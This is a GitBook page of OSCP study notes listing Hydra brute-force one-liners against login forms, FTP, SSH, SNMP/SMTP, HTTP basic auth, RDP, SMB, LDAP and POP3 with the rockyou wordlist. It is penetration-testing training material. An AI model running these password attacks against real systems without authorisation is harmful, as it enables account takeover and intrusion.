Progressive OSCP
  • Contents
  • Kali Configuration
    • Tmux
  • Brute Force
    • Hydra
  • Linux Privilege Escalation
  • TryHackMe Writeups
    • Vulnversity (Privilege Escalation)
    • Content Security Policy Writeup
Powered by GitBook
On this page
  • http-post-form
  • ftp
  • ssh
  • snmp, smtp
  • popup box
  • RDP
  • SMB, LDAP, POP3

Was this helpful?

  1. Brute Force

Hydra

http-post-form

hydra -l name -P rockyou.txt $ip http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect" -V

ftp

hydra -t 4 -l name -P rockyou.txt -vV $ip ftp # -t 4 are parallel connections per target

ssh

hydra -l molly -P rockyou.txt $ip ssh -V

snmp, smtp

hydra -P rockyou.txt -v $ip snmp/smtp

popup box

hydra -l bob -P rockyou.txt $ip http-get /protected

The trick here is to separately set the IP and PATH

RDP

hydra -t 1 -V -f -l administrator -P rockyou.txt rdp://$ip

SMB, LDAP, POP3

hydra -L users.txt -P rockyou.txt $ip smb/ldap2/pop3 -V -f

Always have ZAP, Burp or Wfuzz as backup

PreviousBrute ForceNextLinux Privilege Escalation

Last updated 4 years ago

Was this helpful?